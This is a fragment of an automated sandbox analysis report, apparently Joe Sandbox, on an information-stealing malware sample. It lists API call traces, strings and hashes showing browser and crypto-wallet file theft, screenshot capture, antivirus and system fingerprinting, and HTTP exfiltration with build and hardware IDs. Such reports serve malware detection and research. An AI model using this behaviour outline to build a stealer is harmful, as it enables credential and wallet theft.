• Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                            • String ID: Brave$E$Google Chrome$Opera GX$Preferences$P@$P@E$\BraveWallet\Preferences
                                                                                                                                                                                                            • API String ID: 2567437900-2661835735
                                                                                                                                                                                                            • Opcode ID: ea36f979fa23655f1fd5d804a067a1624586dc783084986a9127da92bdc6040e
                                                                                                                                                                                                            • Instruction ID: 25236dbe1d65cefae93bb0319296957f8d262425f002151ff119f50e668ab3c6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea36f979fa23655f1fd5d804a067a1624586dc783084986a9127da92bdc6040e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89826470900248EADB15EBA5D959BDD7BB86F19304F5080BEF945732C2DB781B0CCBA6
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

[Control-flow graph of the function starting at 00404420; graph not preserved. Legend: Executed, Not Executed]
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043A2
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043AF
                                                                                                                                                                                                              • Part of subcall function 00404350: ??_U@YAPAXI@Z.MSVCRT ref: 004043BC
                                                                                                                                                                                                              • Part of subcall function 00404350: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043D6
                                                                                                                                                                                                              • Part of subcall function 00404350: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043E6
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044EA
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00CBF2F0,?,?,?,?,?,?,00000000), ref: 0040450A
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404694
                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00CBF430,?,00CC2020,00000000,00000000,-00400100,00000000), ref: 004046D5
                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004046FB
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,0041FC79,?,?,?,004266D5,00000000,0041FC79,?,00000000,0041FC79,",00000000,0041FC79,build_id), ref: 004049CA
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004049E3
                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004049F4
                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 00404A0B
                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 00404A5F
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404A6A
                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00404A7F
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404A89
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$FileHttpOpenReadRequestlstrcat$ConnectCrackOptionSend
                                                                                                                                                                                                            • String ID: !$"$"$------$------$------$build_id$hwid
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcat$wsprintf$FileFindFirstMatchPathSpec
                                                                                                                                                                                                            • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 00411C2B
                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00411CAA
                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00411CB7
                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00411CBE
                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00411CC7
                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411CD8
                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00411CE3
                                                                                                                                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411D03
                                                                                                                                                                                                            • GlobalFix.KERNEL32(000000FF), ref: 00411D7D
                                                                                                                                                                                                            • GlobalSize.KERNEL32(000000FF), ref: 00411D8A
                                                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00411E09
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00411E27
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00411E2E
                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00411E36
                                                                                                                                                                                                            • CloseWindow.USER32(00000000), ref: 00411E3D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object$Window$CompatibleCreateDeleteGlobalSelect$BitmapCloseDesktopRectReleaseSizememset
                                                                                                                                                                                                            • String ID: image/jpeg
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00416BFB
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00416C12
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,004274EC), ref: 00416C4C
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,004274F0), ref: 00416C66
                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00CBF420), ref: 00416CA4
                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00CBF350), ref: 00416CB8
                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 00416CCC
                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 00416CDA
                                                                                                                                                                                                            • lstrcat.KERNEL32(?,004274F4), ref: 00416CEC
                                                                                                                                                                                                            • lstrcat.KERNEL32(?,?), ref: 00416D00
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 00416DA1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcat$FileFind$FirstNextwsprintf
                                                                                                                                                                                                            • String ID: %s\%s
                                                                                                                                                                                                            • API String ID: 111849568-4073750446
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00427260,00000000,?,00000000,00000000), ref: 004110E3
                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427260), ref: 004110F4
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00427B4C,00000000,00000001,00427A7C,?,?,00000000,?,AV: ,00000000,?,00427260,00000000,?,00000000,00000000), ref: 0041110E
                                                                                                                                                                                                            • CoSetProxyBlanket.OLE32(`rB,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427260,00000000), ref: 00411147
                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004111A2
                                                                                                                                                                                                              • Part of subcall function 004114D0: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,004111CB,?,?,00000000,?,AV: ,00000000,?,00427260,00000000,?,00000000), ref: 004114D8
                                                                                                                                                                                                              • Part of subcall function 004114D0: CharToOemW.USER32(?,00000000), ref: 004114E5
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004111DD
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                            • String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$`rB$displayName$root\SecurityCenter2
                                                                                                                                                                                                            • API String ID: 685420537-116389011
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00423334,?,0040203B,?,00423330,?,00000000,00000000,?,00000000), ref: 00401386
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00423338,?,00000000), ref: 004013FC
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,0042333C,?,00000000), ref: 00401416
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00423348,?,?,?,00423344,?,0040203B,?,00423340,?,00000000), ref: 00401543
                                                                                                                                                                                                              • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,viB,00000000,00000000,?,00000000), ref: 00411588
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 00411330: GetSystemTime.KERNEL32(?,00CBE790,004270B8,?,00000000,00000008,?,?,00000000,00421951,000000FF,?,0040452E,0041FC79,00000014), ref: 00411385
                                                                                                                                                                                                              • Part of subcall function 0040FD40: lstrcpy.KERNEL32(00000000), ref: 0040FD68
                                                                                                                                                                                                              • Part of subcall function 00406D60: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000), ref: 00406D97
                                                                                                                                                                                                              • Part of subcall function 00406D60: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DAD
                                                                                                                                                                                                              • Part of subcall function 00406D60: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DC8
                                                                                                                                                                                                              • Part of subcall function 00406D60: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DE1
                                                                                                                                                                                                              • Part of subcall function 00406D60: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,L3B,?,?,?,?,?,0042334C,?,00000000), ref: 00401817
                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,0042334C,?,00000000), ref: 00401826
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?,?,00000000), ref: 00401B74
                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,00000000), ref: 00401B83
                                                                                                                                                                                                              • Part of subcall function 004152B0: Sleep.KERNEL32(000003E8,00422461, cA,?,?,?,00000001), ref: 00415375
                                                                                                                                                                                                              • Part of subcall function 004152B0: CreateThread.KERNEL32(00000000,00000000,00413CE0,?,00000000,00000000), ref: 00415396
                                                                                                                                                                                                              • Part of subcall function 004152B0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004153A2
                                                                                                                                                                                                              • Part of subcall function 004114F0: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421A38,000000FF,?,0040E60A,?,00000000,00000000,00000000,?,?), ref: 00411517
                                                                                                                                                                                                              • Part of subcall function 00406D60: LocalFree.KERNEL32(?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E01
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                            • String ID: %$; @4$L3B$\*.*
                                                                                                                                                                                                            • API String ID: 2707319931-3712019551
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00416829
                                                                                                                                                                                                            • memset.MSVCRT ref: 0041684E
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(00000000,?,?,00000004), ref: 00416857
                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00416876
                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00416894
                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 004168B7
                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0041691E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
                                                                                                                                                                                                            • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                            • API String ID: 1884655365-147700698
                                                                                                                                                                                                            • Opcode ID: 900c35ab7afcc40e7a7cf5b430d2d5458d1d11d08c7f5bab420e5e77f220ba17
                                                                                                                                                                                                            • Instruction ID: 7abcdadd1047882aeb49e6bc0230b2c49127e92fec4c539b78c5da6f41ef3bb1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 900c35ab7afcc40e7a7cf5b430d2d5458d1d11d08c7f5bab420e5e77f220ba17
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2616DB5500244AFDB20EF61DC45FEE7778AF05704F90412AB919A32C2DF78AA4D8B69
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcpy.KERNEL32(00000000), ref: 0040FE93
                                                                                                                                                                                                              • Part of subcall function 0040FE30: lstrcat.KERNEL32(?,00000000), ref: 0040FE9F
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,004268F7,00000000,?,00426AF8,?,?,004268F7,?,00000004), ref: 0040A4A1
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426AFC), ref: 0040A4DD
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00426B00), ref: 0040A4F7
                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00CC1BE8,00000000,?,?,?,00426B04,?,?,004268FA), ref: 0040A58C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2567437900-0
                                                                                                                                                                                                            • Opcode ID: 20c6a2aa23b27b3b7ad4ee61940e25525bb6fb3bb58954450f4b370ff44bcdc2
                                                                                                                                                                                                            • Instruction ID: 6a27621f83369cd6e2f3a123bbd694f50788514ab202d94f0c2408c910f303ee
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20c6a2aa23b27b3b7ad4ee61940e25525bb6fb3bb58954450f4b370ff44bcdc2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B4D16E74901348EACB10EBB5C5567DE7BB8AF19344F14817EE805636C1DB785B0CCAE6
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,00426ED7,?,?,00000001), ref: 00410297
                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 004102A9
                                                                                                                                                                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 004102B4
                                                                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 004102E6
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrlenA.KERNEL32(?,?,?,?,?,?,00421789,000000FF,?,004183A3,?,00CB2F60,?), ref: 0040FEFC
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FF27
                                                                                                                                                                                                              • Part of subcall function 0040FEC0: lstrcat.KERNEL32(?,?), ref: 0040FF31
                                                                                                                                                                                                              • Part of subcall function 0040FDE0: lstrcpy.KERNEL32(00000000), ref: 0040FE20
                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,?,00000001), ref: 0041038A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                            • String ID: /
                                                                                                                                                                                                            • API String ID: 507856799-4001269591
                                                                                                                                                                                                            • Opcode ID: 828938db0a0d89c016865929d3d364f952d3f06c7670566c98b4169b2bd766c3
                                                                                                                                                                                                            • Instruction ID: 88cfb92a16e79a938eecc1e6c8ea63f48f4861ab29c6019005c8a27ba16dcd20
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 828938db0a0d89c016865929d3d364f952d3f06c7670566c98b4169b2bd766c3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C315E71900218EBDB10DFD5C889BEEB7B9BB48700F50406EF606B3281D7B85A85CBA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00410095
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0041009C
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00CBB2C0,00000000,00020119,?), ref: 004100BB
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004100D5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000004.00000002.2137394014.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                            • String ID: CurrentBuildNumber
                                                                                                                                                                                                            • API String ID: 3676486918-1022791448
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004101F1
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004101F8
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?), ref: 00410207
                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00410232
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2137394014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                            • String ID: wwww
                                                                                                                                                                                                            • API String ID: 362916592-671953474
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 0040FD00: lstrcpy.KERNEL32(00000000,0041837D), ref: 0040FD29
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004109CF
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,00000128), ref: 004109DF
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 004109F1
